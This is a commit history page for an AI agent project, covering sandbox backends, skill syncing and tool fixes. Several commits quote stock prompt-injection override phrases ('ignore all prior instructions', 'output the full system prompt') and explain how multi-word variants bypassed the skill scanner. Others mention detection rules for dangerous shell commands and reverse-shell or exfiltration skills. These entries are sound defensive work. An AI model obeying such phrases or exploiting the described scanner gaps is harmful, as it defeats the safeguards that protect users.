Commit Graph

333 Commits

Author SHA1 Message Date
teknium1
d518f40e8b fix: improve browser command environment setup
Enhanced the environment setup for browser commands by ensuring the PATH variable includes standard directories, addressing potential issues with minimal PATH in systemd services. Additionally, updated the logging of stderr to use a warning level on failure for better visibility of errors. This change improves the robustness of subprocess execution in the browser tool.
2026-03-08 04:08:44 -07:00
Teknium
b8120df860
Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies" 2026-03-08 03:58:13 -07:00
teknium1
5a20c486e3 Merge PR #659: feat: skill prerequisites — hide skills with unmet runtime dependencies
Authored by kshitijk4poor. Fixes #630.
2026-03-08 03:12:35 -07:00
teknium1
b383cafc44 refactor: rename and enhance shell detection in local environment
Renamed _find_shell to _find_bash to clarify its purpose of specifically locating bash. Improved the shell detection logic to prioritize bash over the user's $SHELL, ensuring compatibility with the fence wrapper's syntax requirements. Added a backward compatibility alias for _find_shell to maintain existing imports in process_registry.py.
2026-03-08 03:00:05 -07:00
teknium1
b10ff83566 fix: enhance PATH handling in local environment
Updated the LocalEnvironment class to ensure the PATH variable includes standard directories. This change addresses issues with systemd services and terminal multiplexers that inherit a minimal PATH, improving the execution environment for subprocesses.
2026-03-08 01:50:38 -08:00
teknium1
daa1f542f9 fix: enhance shell detection in local environment configuration
Updated the _find_shell function to improve shell detection on non-Windows systems. The function now checks for the existence of /usr/bin/bash and /bin/bash before falling back to /bin/sh, ensuring a more robust shell resolution process.
2026-03-08 01:43:00 -08:00
kshitij
f210510276 feat: add prerequisites field to skill spec — hide skills with unmet dependencies
Skills can now declare runtime prerequisites (env vars, CLI binaries) via
YAML frontmatter. Skills with unmet prerequisites are excluded from the
system prompt so the agent never claims capabilities it can't deliver, and
skill_view() warns the agent about what's missing.

Three layers of defense:
- build_skills_system_prompt() filters out unavailable skills
- _find_all_skills() flags unmet prerequisites in metadata
- skill_view() returns prerequisites_warning with actionable details

Tagged 12 bundled skills that have hard runtime dependencies:
gif-search (TENOR_API_KEY), notion (NOTION_API_KEY), himalaya, imessage,
apple-notes, apple-reminders, openhue, duckduckgo-search, codebase-inspection,
blogwatcher, songsee, mcporter.

Closes #658
Fixes #630
2026-03-08 13:19:32 +05:30
teknium1
b8c3bc7841 feat: browser screenshot sharing via MEDIA: on all messaging platforms
browser_vision now saves screenshots persistently to ~/.hermes/browser_screenshots/
and returns the screenshot_path in its JSON response. The model can include
MEDIA:<path> in its response to share screenshots as native photos.

Changes:
- browser_tool.py: Save screenshots persistently, return screenshot_path,
  auto-cleanup files older than 24 hours, mkdir moved inside try/except
- telegram.py: Add send_image_file() — sends local images via bot.send_photo()
- discord.py: Add send_image_file() — sends local images via discord.File
- slack.py: Add send_image_file() — sends local images via files_upload_v2()
  (WhatsApp already had send_image_file — no changes needed)
- prompt_builder.py: Updated Telegram hint to list image extensions,
  added Discord and Slack MEDIA: platform hints
- browser.md: Document screenshot sharing and 24h cleanup
- send_file_integration_map.md: Updated to reflect send_image_file is now
  implemented on Telegram/Discord/Slack
- test_send_image_file.py: 19 tests covering MEDIA: .png extraction,
  send_image_file on all platforms, and screenshot cleanup

Partially addresses #466 (Phase 0: platform adapter gaps for send_image_file).
2026-03-07 22:57:05 -08:00
teknium1
3830bbda41 fix: include url in web_extract trimmed results & fix docs
The web_extract_tool was stripping the 'url' key during its output
trimming step, but documentation in 3 places claimed it was present.
This caused KeyError when accessing result['url'] in execute_code
scripts, especially when extracting from multiple URLs.

Changes:
- web_tools.py: Add 'url' back to trimmed_results output
- code_execution_tool.py: Add 'title' to _TOOL_STUBS docstring and
  _TOOL_DOC_LINES so docs match actual {url, title, content, error}
  response format
2026-03-07 18:07:36 -08:00
teknium1
9ee4fe41fe Fix image_generate 'Event loop is closed' in gateway
Root cause: fal_client.AsyncClient uses @cached_property for its
httpx.AsyncClient, creating it once and caching forever. In the gateway,
the agent runs in a thread pool where _run_async() calls asyncio.run()
which creates a temporary event loop. The first call works, but
asyncio.run() closes that loop. On the next call, a new loop is created
but the cached httpx.AsyncClient still references the old closed loop,
causing 'Event loop is closed'.

Fix: Switch from async fal_client API (submit_async/handler.get with
await) to sync API (submit/handler.get). The sync API uses httpx.Client
which has no event loop dependency. Since the tool already runs in a
thread pool via the gateway, async adds no benefit here.

Changes:
- image_generate_tool: async def -> def
- _upscale_image: async def -> def
- fal_client.submit_async -> fal_client.submit
- await handler.get() -> handler.get()
- is_async=True -> is_async=False in registry
- Remove unused asyncio import
2026-03-07 16:56:49 -08:00
Blake Johnson
c6df39955c fix: limit concurrent Modal sandbox creations to avoid deadlocks
- Add max_concurrent_tasks config (default 8) with semaphore in TB2 eval
- Pass cwd: /app via register_task_env_overrides for TB2 tasks
- Add /home/ to host path prefixes as safety net for container backends

When all 86 TerminalBench2 tasks fire simultaneously, each creates a Modal sandbox
via asyncio.run() inside a thread pool worker. Modal's blocking calls deadlock
when too many are created at once. The semaphore ensures max 8 concurrent creations.

Co-Authored-By: hermes-agent[bot] <hermes-agent[bot]@users.noreply.github.com>
2026-03-07 14:02:34 -08:00
aydnOktay
19459b7623 Improve skills tool error handling 2026-03-08 00:30:49 +03:00
teknium1
8c0f8baf32 feat(delegate_tool): add additional parameters for child agent configuration
Enhanced the _run_single_child function by introducing max_tokens, reasoning_config, and prefill_messages parameters from the parent agent. This allows for more flexible configuration of child agents, improving their operational capabilities.
2026-03-07 11:29:17 -08:00
teknium1
fb0f579b16 refactor: remove model parameter from delegate_task function
Eliminated the model parameter from the delegate_task function and its associated schema, defaulting to None for subagent calls. This change simplifies the function signature and enforces consistent behavior across task delegation.
2026-03-07 09:20:27 -08:00
teknium1
0a82396718 feat: shared iteration budget across parent + subagents
Subagent tool calls now count toward the same session-wide iteration
limit as the parent agent. Previously, each subagent had its own
independent counter, so a parent with max_iterations=60 could spawn
3 subagents each doing 50 calls = 150 total tool calls unmetered.

Changes:
- IterationBudget: thread-safe shared counter (run_agent.py)
  - consume(): try to use one iteration, returns False if exhausted
  - refund(): give back one iteration (for execute_code turns)
  - Thread-safe via Lock (subagents run in ThreadPoolExecutor)
- Parent creates the budget, children inherit it via delegate_tool.py
- execute_code turns are refunded (don't count against budget)
- Default raised from 60 → 90 to account for shared consumption
- Per-child cap (50) still applies as a safety valve

The per-child max_iterations (default 50) remains as a per-child
ceiling, but the shared budget is the hard session-wide limit.
A child stops at whichever comes first.
2026-03-07 08:16:37 -08:00
alireza78a
40bc7216e1 fix(security): use in-memory set for permanent allowlist save 2026-03-07 19:33:30 +03:30
aydnOktay
86caa8539c Improve TTS error handling and logging 2026-03-07 16:53:30 +03:00
teknium1
d29249b8fa feat: local browser backend — zero-cost headless Chromium via agent-browser
Add local browser mode as an automatic fallback when Browserbase
credentials are not configured. Uses the same agent-browser CLI with
--session (local Chromium) instead of --cdp (cloud Browserbase).

The agent-facing API is completely unchanged — all 10 browser_* tools
produce identical output in both modes. Auto-detection:
  - BROWSERBASE_API_KEY set → cloud mode (existing behavior)
  - No key → local mode (new, free, headless Chromium)

Changes:
- _is_local_mode(): auto-detect based on env vars
- _create_local_session(): lightweight session (no API call)
- _get_session_info(): branches on local vs cloud
- _run_browser_command(): --session in local, --cdp in cloud
- check_browser_requirements(): only needs agent-browser CLI in local mode
- _emergency_cleanup: CLI close in local, API release in cloud
- cleanup_browser/browser_close: skip BB API calls in local mode
- Registry: removed requires_env — check_fn handles both modes

Setup for local mode:
  npm install -g agent-browser
  agent-browser install              # downloads Chromium
  agent-browser install --with-deps  # also installs system libs (Docker/Debian)

Closes #374 (Phase 1)
2026-03-07 01:14:57 -08:00
teknium1
f668e9fc75 feat: platform-conditional skill loading + Apple/macOS skills
Add a 'platforms' field to SKILL.md frontmatter that restricts skills
to specific operating systems. Skills with platforms: [macos] only
appear in the system prompt, skills_list(), and slash commands on macOS.
Skills without the field load everywhere (backward compatible).

Implementation:
- skill_matches_platform() in tools/skills_tool.py — core filter
- Wired into all 3 discovery paths: prompt_builder.py, skills_tool.py,
  skill_commands.py
- 28 new tests across 3 test files

New bundled Apple/macOS skills (all platforms: [macos]):
- imessage — Send/receive iMessages via imsg CLI
- apple-reminders — Manage Reminders via remindctl CLI
- apple-notes — Manage Notes via memo CLI
- findmy — Track devices/AirTags via AppleScript + screen capture

Docs updated: CONTRIBUTING.md, AGENTS.md, creating-skills.md,
skills.md (user guide)
2026-03-07 00:47:54 -08:00
teknium1
69a36a3361 Merge PR #309: fix(timezone): timezone-aware now() for prompt, cron, and execute_code
Authored by areu01or00. Adds timezone support via hermes_time.now() helper
with IANA timezone resolution (HERMES_TIMEZONE env → config.yaml → server-local).
Updates system prompt timestamp, cron scheduling, and execute_code sandbox TZ
injection. Includes config migration (v4→v5) and comprehensive test coverage.
2026-03-07 00:04:41 -08:00
teknium1
479dfc096a Merge PR #473: Update model id in OpenRouter from minimax-m2.1 to minimax-m2.5
Authored by tars90percent. Updates remaining minimax-m2.1 references to
minimax-m2.5 in rl_training_tool.py and docs.
2026-03-06 18:43:18 -08:00
alireza78a
a857321463 fix(code-execution): close server socket in finally block to prevent fd leak 2026-03-07 05:49:48 +03:30
teknium1
f75b1d21b4 fix: execute_code and delegate_task now respect disabled toolsets
When a user disables the web toolset via 'hermes tools', the execute_code
schema description still hardcoded web_search/web_extract as available,
causing the model to keep trying to use them. Similarly, delegate_task
always defaulted to ['terminal', 'file', 'web'] for subagents regardless
of the parent's config.

Changes:
- execute_code schema is now built dynamically via build_execute_code_schema()
  based on which sandbox tools are actually enabled
- model_tools.py rebuilds the execute_code schema at definition time using
  the intersection of sandbox-allowed and session-enabled tools
- delegate_task now inherits the parent agent's enabled_toolsets instead of
  hardcoding DEFAULT_TOOLSETS when no explicit toolsets are specified
- delegate_task description updated to say 'inherits your enabled toolsets'

Reported by kotyKD on Discord.
2026-03-06 17:36:14 -08:00
0xbyt4
211b55815e fix: prevent data loss in skills sync on copy/update failure
Two bugs in sync_skills():

1. Failed copytree poisons manifest: when shutil.copytree fails (disk
   full, permission error), the skill is still recorded in the manifest.
   On the next sync, the skill appears as "in manifest but not on disk"
   which is interpreted as "user deliberately deleted it" — the skill
   is never retried.  Fix: only write to manifest on successful copy.

2. Failed update destroys user copy: rmtree deletes the existing skill
   directory before copytree runs. If copytree then fails, the user's
   skill is gone with no way to recover.  Fix: move to .bak before
   copying, restore from backup if copytree fails.

Both bugs are proven by new regression tests that fail on the old code
and pass on the fix.
2026-03-07 03:58:32 +03:00
teknium1
4f56e31dc7 fix: track origin hashes in skills manifest to preserve user modifications
Upgrade skills_sync manifest to v2 format (name:origin_hash). The origin
hash records the MD5 of the bundled skill at the time it was last synced.

On update, the user's copy is compared against the origin hash:
- User copy == origin hash → unmodified → safe to update from bundled
- User copy != origin hash → user customized → skip (preserve changes)

v1 manifests (plain names) are auto-migrated: the user's current hash
becomes the baseline, so future syncs can detect modifications.

Output now shows user-modified skills:
  ~ whisper (user-modified, skipping)

27 tests covering all scenarios including v1→v2 migration, user
modification detection, update after migration, and origin hash tracking.
2009 tests pass.
2026-03-06 16:13:58 -08:00
teknium1
ab0f4126cf fix: restore all removed bundled skills + fix skills sync system
- Restored 21 skills removed in commits 757d012 and 740dd92:
  accelerate, audiocraft, code-review, faiss, flash-attention, gguf,
  grpo-rl-training, guidance, llava, nemo-curator, obliteratus, peft,
  pytorch-fsdp, pytorch-lightning, simpo, slime, stable-diffusion,
  tensorrt-llm, torchtitan, trl-fine-tuning, whisper

- Rewrote sync_skills() with proper update semantics:
  * New skills (not in manifest): copied to user dir
  * Existing skills (in manifest + on disk): updated via hash comparison
  * User-deleted skills (in manifest, not on disk): respected, not re-added
  * Stale manifest entries (removed from bundled): cleaned from manifest

- Added sync_skills() to CLI startup (cmd_chat) and gateway startup
  (start_gateway) — previously only ran during 'hermes update'

- Updated cmd_update output to show new/updated/cleaned counts

- Rewrote tests: 20 tests covering manifest CRUD, dir hashing, fresh
  install, user deletion respect, update detection, stale cleanup, and
  name collision handling

75 bundled skills total. 2002 tests pass.
2026-03-06 15:57:30 -08:00
aydnOktay
566aeaeefa Make skill file writes atomic 2026-03-07 00:49:10 +03:00
Himess
7a0544ab57
fix: three small inconsistencies across cron, gateway, and daytona
1. cron/jobs.py: respect HERMES_HOME env var for job storage path.
   scheduler.py already uses os.getenv("HERMES_HOME", ...) but jobs.py
   hardcodes Path.home() / ".hermes", causing path mismatch when
   HERMES_HOME is set.

2. gateway/run.py: add Platform.HOMEASSISTANT to default_toolset_map
   and platform_config_key. The adapter and hermes-homeassistant
   toolset both exist but the mapping dicts omit it, so HomeAssistant
   events silently fall back to the Telegram toolset.

3. tools/environments/daytona.py: use time.monotonic() for deadline
   instead of float subtraction. All other backends (docker, ssh,
   singularity, local) use monotonic clock for timeout tracking.
   The accumulator pattern (deadline -= 0.2) drifts because
   t.join(0.2) + interrupt checks take longer than 0.2s per iteration.
2026-03-06 16:52:17 +03:00
teknium1
d63b363cde refactor: extract atomic_json_write helper, add 24 checkpoint tests
Extract the duplicated temp-file + fsync + os.replace pattern from
batch_runner.py (1 instance) and process_registry.py (2 instances) into
a shared utils.atomic_json_write() function.

Add 12 tests for atomic_json_write covering: valid JSON, parent dir
creation, overwrite, crash safety (original preserved on error), no temp
file leaks, string paths, unicode, custom indent, concurrent writes.

Add 12 tests for batch_runner checkpoint behavior covering:
_save_checkpoint (valid JSON, last_updated, overwrite, lock/no-lock,
parent dirs, no temp leaks), _load_checkpoint (missing file, existing
data, corrupt JSON), and resume logic (preserves prior progress,
different run_name starts fresh).
2026-03-06 05:50:12 -08:00
teknium1
c05c60665e Merge PR #298: Make process_registry checkpoint writes atomic
Authored by aydnOktay. Companion to PR #297 (batch_runner). Applies the
same atomic write pattern (temp file + fsync + os.replace) to both
_write_checkpoint() and recover_from_checkpoint() in process_registry.py.
Prevents checkpoint corruption on gateway crashes. Also improves error
handling: bare 'pass' replaced with logger.debug(..., exc_info=True)
for better debugging.
2026-03-06 05:32:35 -08:00
Himess
453e0677d6
fix: use regex for search output parsing to handle Windows drive-letter paths
The ripgrep/grep output parser uses `split(':', 2)` to extract
file:lineno:content from match lines. On Windows, absolute paths
contain a drive letter colon (e.g. `C:\Users\foo\bar.py:42:content`),
so `split(':', 2)` produces `["C", "\Users\...", "42:content"]`.
`int(parts[1])` then raises ValueError and the match is silently
dropped. All search results are lost on Windows.

Same category as #390 — string-based path parsing that fails on
Windows. Replace `split()` with a regex that optionally captures
the drive letter prefix: `^([A-Za-z]:)?(.*?):(\d+):(.*)$`.

Applied to both `_search_with_rg` and `_search_with_grep`.
2026-03-06 15:54:33 +03:00
teknium1
3670089a42 docs: add Daytona to batch_runner, process_registry, agent_loop, tool_context
Add daytona_image to batch_runner per-prompt container image overrides
so batch processing works with the Daytona backend. Update inline
comments in RL environment files (agent_loop, tool_context) and
process_registry docstrings to include Daytona in backend lists.
2026-03-06 03:49:59 -08:00
teknium1
3982fcf095 fix: sync execute_code sandbox stubs with real tool schemas
The _TOOL_STUBS dict in code_execution_tool.py was out of sync with the
actual tool schemas, causing TypeErrors when the LLM used parameters it
sees in its system prompt but the sandbox stubs didn't accept:

search_files:
  - Added missing params: context, offset, output_mode
  - Fixed target default: 'grep' → 'content' (old value was obsolete)

patch:
  - Added missing params: mode, patch (V4A multi-file patch support)

Also added 4 drift-detection tests (TestStubSchemaDrift) that will
catch future divergence between stubs and real schemas:
  - test_stubs_cover_all_schema_params: every schema param in stub
  - test_stubs_pass_all_params_to_rpc: every stub param sent over RPC
  - test_search_files_target_uses_current_values: no obsolete values
  - test_generated_module_accepts_all_params: generated code compiles

All 28 tests pass.
2026-03-06 03:40:06 -08:00
teknium1
8481fdcf08 docs: complete Daytona backend documentation coverage
Update all remaining files that enumerate terminal backends to include
Daytona. Covers security docs (bypass info, backend comparison table),
environment variables reference (DAYTONA_API_KEY, TERMINAL_DAYTONA_IMAGE,
container resources header), AGENTS.md (architecture tree, config keys),
environments/README.md, hermes_base_env.py field description, and various
module docstrings.

Follow-up to PR #451 merge.
2026-03-06 03:37:05 -08:00
teknium1
39299e2de4 Merge PR #451: feat: Add Daytona environment backend
Authored by rovle. Adds Daytona as the sixth terminal execution backend
with cloud sandboxes, persistent workspaces, and full CLI/gateway integration.
Includes 24 unit tests and 8 integration tests.
2026-03-06 03:32:40 -08:00
teknium1
efec4fcaab feat(execute_code): add json_parse, shell_quote, retry helpers to sandbox
The execute_code sandbox generates a hermes_tools.py stub module for LLM
scripts. Three common failure modes keep tripping up scripts:

1. json.loads(strict=True) rejects control chars in terminal() output
   (e.g., GitHub issue bodies with literal tabs/newlines)
2. Shell backtick/quote interpretation when interpolating dynamic content
   into terminal() commands (markdown with backticks gets eaten by bash)
3. No retry logic for transient network failures (API timeouts, rate limits)

Adds three convenience helpers to the generated hermes_tools module:

- json_parse(text) — json.loads with strict=False for tolerant parsing
- shell_quote(s) — shlex.quote() for safe shell interpolation
- retry(fn, max_attempts=3, delay=2) — exponential backoff wrapper

Also updates the EXECUTE_CODE_SCHEMA description to document these helpers
so LLMs know they're available without importing anything extra.

Includes 7 new tests (unit + integration) covering all three helpers.
2026-03-06 01:52:46 -08:00
teknium1
f6f3d1de9b fix: review fixes — path traversal guard, trust_style consistency, edge cases
Address code review findings:

Security (Medium):
- Path traversal guard in OptionalSkillSource.fetch() — resolve() and
  validate that the path stays within optional-skills/ before reading

Bug fixes (Medium):
- Add 'builtin' to trust_style dicts in do_inspect() and
  _resolve_short_name() — official skills now show bright_cyan 'official'
  label consistently across all display functions (5/5 dicts fixed)

Edge cases (Low):
- Clamp page_size to [1, 100] in do_browse() to prevent ZeroDivisionError
- Update SkillMeta.source docstring to include 'official'
- Add browse command to optional-skills/DESCRIPTION.md
2026-03-06 01:40:01 -08:00
teknium1
f2e24faaca feat: optional skills — official skills shipped but not activated by default
Add 'optional-skills/' directory for official skills that ship with the repo
but are not copied to ~/.hermes/skills/ during setup. They are:
- NOT shown to the model in the system prompt
- NOT copied during hermes setup/update
- Discoverable via 'hermes skills search' labeled as 'official'
- Installable via 'hermes skills install' with builtin trust (no third-party warning)
- Auto-categorized on install based on directory structure

Implementation:
- OptionalSkillSource adapter in tools/skills_hub.py (search/fetch/inspect)
- Added to create_source_router() as first source (highest priority)
- Trust level 'builtin' for official skills in skills_guard.py
- Friendly install message for official skills (no third-party warning)
- 'official' label in cyan in search results and skill list

First optional skill: Blackbox CLI (autonomous-ai-agents/blackbox)
- Multi-model coding agent with built-in judge/Chairman pattern
- Delegates to Claude, Codex, Gemini, and Blackbox models
- Open-source CLI (GPL-3.0, TypeScript, forked from Gemini CLI)
- Requires paid Blackbox AI API key

Refs: #475
2026-03-06 01:24:11 -08:00
tars90percent
32636ecf8a Update MiniMax model ID from m2.1 to m2.5 2026-03-06 16:47:48 +08:00
teknium1
363633e2ba fix: allow self-hosted Firecrawl without API key + add self-hosting docs
On top of PR #460: self-hosted Firecrawl instances don't require an API
key (USE_DB_AUTHENTICATION=false), so don't force users to set a dummy
FIRECRAWL_API_KEY when FIRECRAWL_API_URL is set. Also adds a proper
self-hosting section to the configuration docs explaining what you get,
what you lose, and how to set it up (Docker stack, tradeoffs vs cloud).

Added 2 more tests (URL-only without key, neither-set raises).
2026-03-05 16:44:21 -08:00
caentzminger
d7d10b14cd
feat(tools): add support for self-hosted firecrawl
Adds optional FIRECRAWL_API_URL environment variable to support
self-hosted Firecrawl deployments alongside the cloud service.

- Add FIRECRAWL_API_URL to optional env vars in hermes_cli/config.py
- Update _get_firecrawl_client() in tools/web_tools.py to accept custom API URL
- Add tests for client initialization with/without URL
- Document new env var in installation and config guides
2026-03-05 16:16:18 -06:00
shitcoinsherpa
dcba291d45 Use pywinpty instead of ptyprocess on Windows for PTY support
ptyprocess depends on Unix-only APIs (fork, openpty) and cannot work
on Windows at all. pywinpty provides a compatible PtyProcess interface
using the Windows ConPTY API.

This conditionally imports winpty.PtyProcess on Windows and
ptyprocess.PtyProcess on Unix. The pyproject.toml pty extra now uses
platform markers so the correct package is installed automatically.
2026-03-05 17:16:04 -05:00
rovle
a6499b6107 fix(daytona): use shell timeout wrapper instead of broken SDK exec timeout
The Daytona SDK's process.exec(timeout=N) parameter is not enforced —
the server-side timeout never fires and the SDK has no client-side
fallback, causing commands to hang indefinitely.

Fix: wrap commands with timeout N sh -c '...' (coreutils) which
reliably kills the process and returns exit code 124. Added
shlex.quote for proper shell escaping and a secondary deadline (timeout + 10s) that force-stops the sandbox if the shell timeout somehow fails.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 13:12:41 -08:00
rovle
efc7a7b957 fix(daytona): don't guess /root on cwd probe failure, keep constructor default; update tests to reflect this
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:49:35 -08:00
rovle
4f1464b3af fix(daytona): default disk to 10GB to match platform limit
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:37:30 -08:00
rovle
577da79a47 fix(daytona): make disk cap visible and use SDK enum for sandbox
state

- Replace logger.warning with warnings.warn for the disk cap so users
  actually see it (logger was suppressed by CLI's log level config)
- Use SandboxState enum instead of string literals in
_ensure_sandbox_ready

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:03:39 -08:00
rovle
1faa9648d3 chore(daytona): cap the disk size to current maximum on daytona sandboxes
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:43:41 -08:00
rovle
435530018b fix(daytona): resolve cwd by detecting home directory inside the sandbox 2026-03-05 10:02:22 -08:00
rovle
c43451a50b feat(terminal): integrate Daytona backend into tool pipeline
Add Daytona to image selection, container_config guards, environment
factory, requirements check, and diagnostics in terminal_tool.py and
file_tools.py. Also add to sandboxed-backend approval bypass.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
rovle
1e312c6582 feat(environments): add Daytona cloud sandbox backend
New execution backend using the Daytona Python SDK. Supports persistent
sandboxes via stop/start lifecycle, interrupt handling, and automatic
retry on transient errors.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
teknium1
ad9c26afb8 Merge PR #293: fix: eliminate shell noise from terminal output and fix test failures
Authored by 0xbyt4. Wraps commands with unique fence markers to isolate real output
from shell init/exit noise (oh-my-zsh, macOS session restore, etc.). Falls back to
expanded pattern-based cleaning. Also fixes BSD find fallback and test module shadowing.
2026-03-05 08:48:26 -08:00
aydnOktay
7d79ce92ac Improve type hints and error diagnostics in vision_tools 2026-03-05 16:11:59 +03:00
teknium1
2465674fda Merge PR #280: fix: add missing dangerous command patterns (tee, process substitution, full-path rm)
Authored by dogiladeveloper. Adds detection for tee writes to sensitive files, process substitution with curl/wget, and find -exec with full-path rm.
2026-03-05 01:56:44 -08:00
teknium1
2eca0d4af1 Merge PR #275: fix(batch_runner): preserve traceback when batch worker fails
Authored by batuhankocyigit. Adds explicit traceback logging for batch worker failures and improves tool dispatch error logging in registry.
2026-03-05 01:44:05 -08:00
rovle
ca33372595 fix: pass task_id to _create_environment as well, to prevent cross-session state mixing
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
teknium1
d0d9897e81 refactor: clean up transcription_tools after PR #262 merge
- Fix incorrect error message (only VOICE_TOOLS_OPENAI_KEY is checked,
  not OPENAI_API_KEY)
- Remove redundant FileNotFoundError catch (exists() check above
  already handles this)
- Consolidate openai imports to single line
- Sort SUPPORTED_FORMATS in error message for deterministic output
2026-03-04 21:35:04 -08:00
teknium1
9306a1e06a Merge PR #262: improve error handling and validation in transcription_tools
Authored by aydnOktay. Adds file format and size validation before API calls,
specific exception handling, and improved logging.
2026-03-04 21:33:03 -08:00
teknium1
141b12bd39 refactor: clean up type hints and docstrings in session_search_tool
Follow-up to PR #261 merge:
- Fix Optional[Any] → Union[int, float, str, None] (actually meaningful)
- Fix _resolve_to_parent return type to str (never returns None in practice)
- Trim verbose docstrings on internal helpers to single-line style
- Correct docstring that claimed 'unknown' on failure (returns str(ts))
2026-03-04 21:25:54 -08:00
teknium1
ae3deff8d4 Merge PR #261: improve error handling and type hints in session_search_tool
Authored by aydnOktay. Adds TimeoutError handling for session summarization,
better exception specificity in _format_timestamp, defensive try/except in
_resolve_to_parent, and type hints.
2026-03-04 21:23:56 -08:00
teknium1
8e901b31c1 Merge PR #214: fix: align _apply_delete comment with actual behavior
Authored by VolodymyrBg.
2026-03-04 20:47:47 -08:00
teknium1
e1baab90f7 Merge PR #201: fix skills hub dedup to prefer higher trust levels
Authored by 0xbyt4.

The dedup logic in GitHubSource.search() and unified_search() used
'r.trust_level == "trusted"' which let trusted results overwrite builtin
ones. Now uses ranked comparison: builtin (2) > trusted (1) > community (0).
2026-03-04 19:40:41 -08:00
teknium1
7128f95621 Merge PR #390: fix hidden directory filter broken on Windows
Authored by Farukest. Fixes #389.

Replaces hardcoded forward-slash string checks ('/.git/', '/.hub/') with
Path.parts membership test in _find_all_skills() and scan_skill_commands().
On Windows, str(Path) uses backslashes so the old filter never matched,
causing quarantined skills to appear as installed.
2026-03-04 19:22:43 -08:00
teknium1
ffc6d767ec Merge PR #388: fix --force bypassing dangerous verdict in should_allow_install
Authored by Farukest. Fixes #387.

Removes 'and not force' from the dangerous verdict check so --force
can never install skills with critical security findings (reverse shells,
data exfiltration, etc). The docstring already documented this behavior
but the code didn't enforce it.
2026-03-04 19:19:57 -08:00
teknium1
44a2d0c01f Merge PR #386: fix symlink boundary check prefix confusion in skills_guard
Authored by Farukest. Fixes #385.

Replaces startswith() with Path.is_relative_to() in _check_structure()
symlink escape check — same fix pattern as skill_view() (PR #352).
Prevents symlinks escaping to sibling directories with shared name prefixes.
2026-03-04 19:13:21 -08:00
teknium1
ff3a479156 fix: coerce session_id and data to string in process tool handler
Some models send session_id as an integer instead of a string, causing
type errors downstream. Defensively cast session_id and write/submit
data args to str to handle non-compliant model outputs.
2026-03-04 16:37:00 -08:00
teknium1
093acd72dd fix: catch exceptions from check_fn in is_toolset_available()
get_definitions() already wrapped check_fn() calls in try/except,
but is_toolset_available() did not. A failing check (network error,
missing import, bad config) would propagate uncaught and crash the
CLI banner, agent startup, and tools-info display.

Now is_toolset_available() catches all exceptions and returns False,
matching the existing pattern in get_definitions().

Added 4 tests covering exception handling in is_toolset_available(),
check_toolset_requirements(), get_definitions(), and
check_tool_availability().

Closes #402
2026-03-04 14:22:30 -08:00
Farukest
f93b48226c
fix: use Path.parts for hidden directory filter in skill listing
The hidden directory filter used hardcoded forward-slash strings like
'/.git/' and '/.hub/' to exclude internal directories. On Windows,
Path returns backslash-separated strings, so the filter never matched.

This caused quarantined skills in .hub/quarantine/ to appear as
installed skills and available slash commands on Windows.

Replaced string-based checks with Path.parts membership test which
works on both Windows and Unix.
2026-03-04 18:34:16 +03:00
Farukest
4805be0119
fix: prevent --force from overriding dangerous verdict in should_allow_install
The docstring states --force should never override dangerous verdicts,
but the condition `if result.verdict == "dangerous" and not force`
allowed force=True to skip the early return. Execution then fell
through to `if force: return True`, bypassing the policy block.

Removed `and not force` so dangerous skills are always blocked
regardless of the --force flag.
2026-03-04 18:10:18 +03:00
Farukest
a3ca71fe26
fix: use is_relative_to() for symlink boundary check in skills_guard
The symlink escape check in _check_structure() used startswith()
without a trailing separator. A symlink resolving to a sibling
directory with a shared prefix (e.g. 'axolotl-backdoor') would pass
the check for 'axolotl' since the string prefix matched.

Replaced with Path.is_relative_to() which correctly handles directory
boundaries and is consistent with the skill_view path check.
2026-03-04 17:23:23 +03:00
teknium1
70a0a5ff4a fix: exclude current session from session_search results
session_search was returning the current session if it matched the
query, which is redundant — the agent already has the current
conversation context. This wasted an LLM summarization call and a
result slot.

Added current_session_id parameter to session_search(). The agent
passes self.session_id and the search filters out any results where
either the raw or parent-resolved session ID matches. Both the raw
match and the parent-resolved match are checked to handle child
sessions from delegation.

Two tests added verifying the exclusion works and that other
sessions are still returned.
2026-03-04 06:06:40 -08:00
teknium1
021f62cb0c fix(security): patch multi-word bypass in 8 more injection patterns
Systematic audit of all prompt injection regexes in skills_guard.py
found 8 more patterns with the same single-word gap vulnerability
fixed in PR #192. Multi-word variants like 'pretend that you are',
'output the full system prompt', 'respond without your safety
filters', etc. all bypassed the scanner.

Fixed patterns:
- you are [now] → you are [... now]
- do not [tell] the user → do not [... tell ... the] user
- pretend [you are|to be] → pretend [... you are|to be]
- output the [system|initial] prompt → output [... system|initial] prompt
- act as if you [have no] [restrictions] → act as if [... you ... have no ... restrictions]
- respond without [restrictions] → respond without [... restrictions]
- you have been [updated] to → you have been [... updated] to
- share [the] [entire] [conversation] → share [... conversation]

All use (?:\w+\s+)* to allow arbitrary intermediate words.
2026-03-04 06:00:41 -08:00
teknium1
ba214e43c8 fix(security): apply same multi-word bypass fix to disregard pattern
The 'disregard ... instructions/rules/guidelines' regex had the
same single-word gap vulnerability as the 'ignore' pattern fixed
in PR #192. 'disregard all your instructions' bypassed the scanner.

Added (?:\w+\s+)* between both keyword groups to allow arbitrary
intermediate words.
2026-03-04 05:55:38 -08:00
teknium1
520a26c48f Merge PR #192: fix(security): catch multi-word prompt injection bypass in skills_guard
Authored by 0xbyt4.

The 'ignore ... instructions' regex only matched a single word between
'ignore' and the keyword (previous/all/above/prior). Multi-word variants
like 'ignore all prior instructions' bypassed the scanner entirely.
2026-03-04 05:54:04 -08:00
teknium1
79871c2083 refactor: use Path.is_relative_to() for skill_view boundary check
Replace the string-based startswith + os.sep approach with
Path.is_relative_to() (Python 3.9+, we require 3.10+). This is
the idiomatic pathlib way to check path containment — it handles
separators, case sensitivity, and the equal-path case natively
without string manipulation.

Simplified tests to match: removed the now-unnecessary
test_separator_is_os_native test since is_relative_to doesn't
depend on separator choice.
2026-03-04 05:30:43 -08:00
Farukest
e86f391cac
